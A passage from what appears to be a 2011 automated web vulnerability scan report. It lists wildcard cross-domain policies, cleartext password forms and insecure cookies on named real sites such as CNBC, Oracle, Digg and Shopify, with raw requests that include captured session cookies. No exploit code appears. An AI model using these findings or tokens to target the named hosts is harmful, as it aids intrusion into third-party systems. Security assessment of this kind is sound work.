X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.16. http://stats.deloitte.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stats.deloitte.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.deloitte.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:02 GMT
Server: Omniture DC/2.0.0
xserver: www384
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wingateweb.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wingateweb.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:53 GMT
Server: Omniture DC/2.0.0
xserver: www93
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.18. http://cnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:43 GMT
Connection: close
Content-Length: 1330

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cvs.shoplocal.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cvs.shoplocal.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 24 Feb 2010 18:37:08 GMT
Accept-Ranges: bytes
ETag: "0a2895e80b5ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 950
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*.msn.com" />

...[SNIP]...
<domain uri="http://*.msn-int.com" />
...[SNIP]...
<domain uri="http://*.crossmediaservices.com"/>
       <domain uri="http://*.shoplocal.com" />
       <domain uri="http://vqascweb1"/>
       <domain uri="http://vqascweb2"/>
       <domain uri="http://devweb1" />
       <domain uri="http://media.pointroll.com" />
       <domain uri="http://www.pointroll.com" />
       <domain uri="http://data.pointroll.com" />
       <domain uri="http://speed.pointroll.com" />
       <domain uri="http://mirror.pointroll.com" />
       <domain uri="http://geo.pointroll.com"/>
       <domain uri="http://*.pointroll.com"/>
...[SNIP]...

5.20. http://executivevision.cnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://executivevision.cnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: executivevision.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:04:28 GMT
Connection: close
Content-Length: 1330

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.21. http://media.cnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.cnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: media.cnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
ETag: "0a59338016cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1330
Date: Tue, 06 Sep 2011 14:56:31 GMT
Connection: close
Cache-Control: public, max-age=900

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.22. http://msnbcmedia.msn.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msnbcmedia.msn.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: msnbcmedia.msn.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:37 GMT
Content-Length: 1330
Content-Type: text/xml
ETag: "0a59338016cc1:0"
Last-Modified: Thu, 19 May 2011 23:55:16 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

5.23. http://www.cnbc.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 14:41:54 GMT
Via: 1.1 C aicache6
Content-Length: 1330
X-Aicache-OS: 207.46.150.45:80
Connection: close
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:33 GMT

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com:8080" />
<domain uri="http://*.interactive.msnbc.com:8095" />
<domain uri="https://*.interactive.msnbc.com"/>
<domain uri="https://*.interactive.msnbc.com:9443" />
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
<domain uri="http://*.fareast.corp.microsoft.com"/>
<domain uri="http://*.fareast.corp.microsoft.com:8080" />
<domain uri="http://*.fareast.corp.microsoft.com:8095" />
<domain uri="https://*.fareast.corp.microsoft.com"/>
<domain uri="https://*.fareast.corp.microsoft.com:9443" />
<domain uri="http://*.msnbc-test.msnbc.com"/>
<domain uri="http://*.msnbc-test.msnbc.com:8080"/>
<domain uri="http://*.msnbc-test.msnbc.com:8095"/>
<domain uri="https://*.msnbc-test.msnbc.com"/>
<domain uri="https://*.msnbc-test.msnbc.com:9443"/>
...[SNIP]...

6. Cleartext submission of password previous next
There are 6 instances of this issue:

http://digg.com/submit
http://www.bigcommerce.com/freetrial.php
http://www.oraclecfo.com/Authentication/Login_w.html
http://www.oraclecfo.com/Main/Home/Home_w.html
http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
http://www.shopify.com/login

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://digg.com/submit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.2. http://www.bigcommerce.com/freetrial.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/freetrial.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bigcommerce.com/signup.php

The form contains the following password fields:

password
password2

Request

GET /freetrial.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 10579
Connection: close
Content-Type: text/html

<style>

.FreeTrialForm { background:#FFF !important; border:1px solid transparent !important; }
.FreeTrialForm p { color:black !important; }
.NoCCRequired { color:gray !important; font-weight:bold; }
...[SNIP]...
</div>
<form action="/signup.php" name="signupform" method="post" onsubmit="return CheckHPForm()" style="margin: 0px;">


                               <input type="hidden" name="roi_formpage" value="/freetrial.php" />
...[SNIP]...
<td>
               <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password" name="password"/>
               <div style="font-size: 11px; color: gray; font-style: italic;">
...[SNIP]...
<td>
               <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password2" name="password2"/>
           </td>
...[SNIP]...

6.3. http://www.oraclecfo.com/Authentication/Login_w.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Authentication/Login_w.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.oraclecfo.com/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==

The form contains the following password field:

ctl00$cphPlaceholder$ctl00$txtPassword

Request

GET /Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; OracleCFOCountry=282; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:11:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->

<form name="CFOForm" method="post" action="/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_cphPlaceholder_ctl00_btnLogin')" id="CFOForm">
<div>
...[SNIP]...
<dd class="floatright clearRight" style="margin-bottom: 0;">
                                   <input name="ctl00$cphPlaceholder$ctl00$txtPassword" type="password" id="ctl00_cphPlaceholder_ctl00_txtPassword" class="mandatory xlgTextbox" />
                               </dd>
...[SNIP]...

6.4. http://www.oraclecfo.com/Main/Home/Home_w.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Main/Home/Home_w.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.oraclecfo.com/Main/Home/Home_w.html

The form contains the following password field:

ctl00$ucNavigationBar$LoginBar_w1$txtPassword

Request

GET /Main/Home/Home_w.html HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:10:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 52760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->

<form name="CFOForm" method="post" action="/Main/Home/Home_w.html" id="CFOForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" />
</li>
...[SNIP]...

6.5. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.oraclecfo.com
Path:	/Main/Solutions/Solutions_w.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.oraclecfo.com/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82

The form contains the following password field:

ctl00$ucNavigationBar$LoginBar_w1$txtPassword

Request

GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oraclecfo.com/Main/Home/Home_w.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

6.6. http://www.shopify.com/login previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.shopify.com/login

The form contains the following password field:

password

Request

GET /login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.8.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; olarkld=1315341237560; _oklv=1315341242826; _s=08DB14DB-F588-4766-8659; __ar_v4=EBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7CRFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "5e6cd1cceddc58f0b1054bb20da87a2e"
X-Rack-Cache: fresh
X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee
X-Runtime: 1746
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 15228
Date: Tue, 06 Sep 2011 15:40:58 GMT
X-Varnish: 1482397443 1482397441
Age: 108
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<div class="col-5" style="padding-top:25px;">
           <form method="post">
               <label for="subdomain">
...[SNIP]...
</label><input class="formnote" id="password" type="password" name="password" value="" /><!-- <span class="formnote">
...[SNIP]...

7. SSL cookie without secure flag set previous next
There are 68 instances of this issue:

https://forums.oracle.com/forums/adfAuthentication
https://forums.oracle.com/forums/category.jspa
https://forums.oracle.com/forums/guestsettings!default.jspa
https://forums.oracle.com/forums/index.jspa
https://forums.oracle.com/forums/login!withRedirect.jspa
https://forums.oracle.com/forums/main.jspa
https://register.cnbc.com/forgotPassword.do
https://register.cnbc.com/memberCenter.do
https://register.cnbc.com/registerUser.do
https://login.cnbc.com/cas/logout
https://login.oracle.com/favicon.ico
https://login.oracle.com/mysso/signon.jsp
https://login.oracle.com/mysso/sso_loginui/b-bg.gif
https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
https://login.oracle.com/mysso/sso_loginui/loginStyling.css
https://login.oracle.com/mysso/sso_loginui/moc_lib.js
https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
https://login.oracle.com/mysso/sso_loginui/sso_check.js
https://login.oracle.com/mysso/sso_loginui/t-bg.gif
https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
https://login.oracle.com/oam/server/sso/auth_cred_submit
https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
https://register.cnbc.com/
https://register.cnbc.com/RandomImage.jsp
https://register.cnbc.com/cas
https://register.cnbc.com/checkemail.do
https://register.cnbc.com/checkpassword.do
https://register.cnbc.com/checkscreenname.do
https://register.cnbc.com/checkzipcode.do
https://register.cnbc.com/createUser.do
https://register.cnbc.com/css/forgotPassword.css
https://register.cnbc.com/css/member_center_sytles.css
https://register.cnbc.com/css/newRegistration.css
https://register.cnbc.com/css/registration.css
https://register.cnbc.com/email/EmailSupport.jsp
https://register.cnbc.com/favicon.ico
https://register.cnbc.com/forgotPassword1.do
https://register.cnbc.com/forgotpassword1.jsp
https://register.cnbc.com/images/clickToContinue.gif
https://register.cnbc.com/images/loaderImage.gif
https://register.cnbc.com/images/memberCenterHeader.jpg
https://register.cnbc.com/images/submitPreferences.jpg
https://register.cnbc.com/images/tick.jpg
https://register.cnbc.com/images/tile_02.gif
https://register.cnbc.com/images/wrong.jpg
https://register.cnbc.com/js/membercenter.js
https://register.cnbc.com/js/prototype_ajax.js
https://register.cnbc.com/js/registrationBasic.js
https://register.cnbc.com/js/registrationUtils.js
https://register.cnbc.com/js/registrationValidations.js
https://register.cnbc.com/js/s_code.js
https://register.cnbc.com/js/validation.js
https://register.cnbc.com/quote-html-webservice/fvquote.htm
https://register.cnbc.com/quote-html-webservice/quote.htm
https://register.cnbc.com/refreshlogin.jsp

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

